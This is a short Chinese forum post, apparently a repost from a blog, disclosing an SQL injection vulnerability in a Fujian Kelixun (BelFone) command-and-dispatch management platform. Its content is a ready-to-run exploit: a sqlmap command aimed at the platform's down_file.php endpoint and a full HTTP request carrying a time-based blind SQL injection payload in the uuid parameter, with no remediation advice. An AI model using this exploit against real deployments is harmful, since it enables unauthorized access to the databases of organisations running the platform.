李优秀 发表于 4 天前

福建科立讯通信 指挥调度管理平台 SQL注入漏洞

北峰通信-福建科立讯通信 指挥调度管理平台 SQL注入漏洞
厂商域名和信息收集
域名:
https://i-blog.csdnimg.cn/direct/8eefbc89f4754c28b65017b45495a6ef.png
工具sqlmap
python sqlmap.py -u "http://ip:端口/api/client/down_file.php?uuid=1" --batch
https://i-blog.csdnimg.cn/direct/de1dc544786a434b9210fc5dd5f69643.png
数据包
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%203018%20FROM%20(SELECT(SLEEP(5)))PUiO)%20AND%20%27ayNf%27=%27ayNf HTTP/1.1
Host: ip:端口
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=8gnvk03ni3efhhsf6s6utobua6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
https://i-blog.csdnimg.cn/direct/32eb64f1ebc04bffbf91fc62bb248076.png

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 福建科立讯通信 指挥调度管理平台 SQL注入漏洞